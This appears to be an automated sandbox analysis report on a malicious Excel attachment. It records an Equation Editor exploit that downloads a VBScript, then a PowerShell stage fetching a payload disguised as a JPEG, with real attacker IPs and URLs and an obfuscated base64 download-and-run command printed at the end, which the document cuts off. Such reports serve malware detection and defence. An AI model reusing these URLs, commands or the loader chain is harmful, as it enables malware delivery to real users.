Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0511 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_036B0511
Source: global trafficHTTP traffic detected: GET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.45.138 104.21.45.138
Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /d/eA3FM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global trafficHTTP traffic detected: GET /agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /3566/loverhappy.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d/eA3FM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknownTCP traffic detected without corresponding DNS query: 91.92.244.96
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0511 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_036B0511
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FC4CD10.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /d/eA3FM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global trafficHTTP traffic detected: GET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /3566/loverhappy.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d/eA3FM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: paste.ee
Source: powershell.exe, 0000000F.00000002.433735210.0000000004D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432397953.00000000026AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432147188.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg
Source: EQNEDT32.EXE, 00000009.00000003.406672171.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.406672171.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.408908665.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.244.96/3566/loverhappy.vbs
Source: EQNEDT32.EXE, 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.244.96/3566/loverhappy.vbsj
Source: EQNEDT32.EXE, 00000009.00000002.408908665.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.244.96/3566/loverhappy.vbsooC:
Source: agh on 91.92.244.96.url.4.drString found in binary or memory: http://91.92.244.96/agh/
Source: SHREE GANESH BOOK SERVICES-347274.xlsString found in binary or memory: http://91.92.244.96/agh/mcirosfotupdated
Source: ~DF7A800E1E03CB42AF.TMP.0.dr, mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC.url.4.dr, 6D330000.0.drString found in binary or memory: http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfa
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: wscript.exe, 0000000A.00000002.415217505.0000000000577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414742956.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415020230.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, loverhappy.vbs.9.dr, loverhappy[1].vbs.9.drString found in binary or memory: http://paste.ee/d/eA3FM
Source: powershell.exe, 0000000C.00000002.504808808.000000000258F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432397953.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.470018186.000000000D9CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.434194495.0000000006360000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://tempuri.org/BD_AUTOMCAODataSet1.xsd
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/eA3FM
Source: wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 0000000F.00000002.432397953.00000000026AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000F.00000002.433735210.0000000004D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432397953.00000000026AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432147188.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
Source: wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3476, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3636, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 18 19 20 21 OWn the dcjcumenc m If as document we cmce yuu haw ena
Source: Screenshot number: 12Screenshot OCR: document is protected 15 :: 1 18 19 20 21 Open the dcjcumenk m If as document we cmce yu
Source: Screenshot number: 16Screenshot OCR: document is protected 15 :: 1 18 19 20 21 Open the dckumem M If INS document was cmce you have
Excel sheet contains many unusual embedded objects
Source: SHREE GANESH BOOK SERVICES-347274.xlsOLE: Microsoft Excel 2007+
Source: ~DF339C70062F0AA3F9.TMP.0.drOLE: Microsoft Excel 2007+
Source: 6D330000.0.drOLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC.urlJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\agh on 91.92.244.96.urlJump to behavior
Very long command line found
Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8408
Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8408Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgT